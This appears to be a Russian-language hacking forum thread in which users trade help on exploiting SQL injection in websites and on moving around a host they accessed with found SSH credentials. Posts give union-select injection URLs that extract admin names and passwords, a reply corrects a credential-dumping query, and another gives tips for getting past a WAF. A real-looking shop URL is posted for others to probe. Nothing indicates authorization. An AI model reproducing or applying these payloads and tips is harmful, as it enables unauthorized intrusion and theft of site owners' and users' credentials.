Пример запроса через конструкцию union select можно? Или Error Based если возможно провести запрос без использования запятых. Спасибо.
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara. Доступ оказался доступом по SSH Зашёл и обнаружил проблему - Из под шелла (пользователь user1): cd home ls -la 5 папок с датой за июль А из под SSH (пользователь sara): cd home ls -la 3 папки с датой за июнь Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно. Теперь вопрос - почему так? Почему разные даты и разное количество папок? Вывод id user1: uid=510(user1) gid=500(user) groups=500(user) user: uid=500(user) gid=500(user) groups=500(user) sara: uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
кто подскажет, что за ошибка? sql inj или нет? Code: hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
Парни, такая ситуация. Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level. Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20from%20admin%20limit%200,1-- Ответ - Table 'site.admin' doesn't exist Подскажите, что за ситуация и как быть?
запрос должен быть таким примерно http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1-- [название бд сайта]- узнайте запросом http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
Неужели никто не знает, что делать? Еще пару вопросов, если позволите. 1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4 дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden Почему? 2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645 Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?
1) Вероятно, WAF, которые чихает на version или на скобки. Проверяйте по спецсимволвам и ключевам словам. 2) Как уже сказали, возможно error-based вектор. Или же здесь несколько запросов один за другим. И попробуйте дописать комментарий в конец, если еще не.
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara. Доступ оказался доступом по SSH Зашёл и обнаружил проблему - Из под шелла (пользователь user1): cd home ls -la 5 папок с датой за июль А из под SSH (пользователь sara): cd home ls -la 3 папки с датой за июнь Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно. Теперь вопрос - почему так? Почему разные даты и разное количество папок? Вывод id user1: uid=510(user1) gid=500(user) groups=500(user) user: uid=500(user) gid=500(user) groups=500(user) sara: uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
Если вы не путаете, то на цели либо форвардинг на другую машину, либо веб в чруте. Сделайте ifconfig, netstat, поищите свои коннекты к вебу, попробуйте забиндить порт и прицепиться к нему. То есть, подтвердить то, что это одна и та же железка.
Сильно не пинайте за нубский вопрос... Нахожу sql иньекцию, раскручиваю, просматриваю таблицы и колонки, нигде ничего похожего на user, members, accounts, passwords нет. Пароли обязательно в базе должны быть?
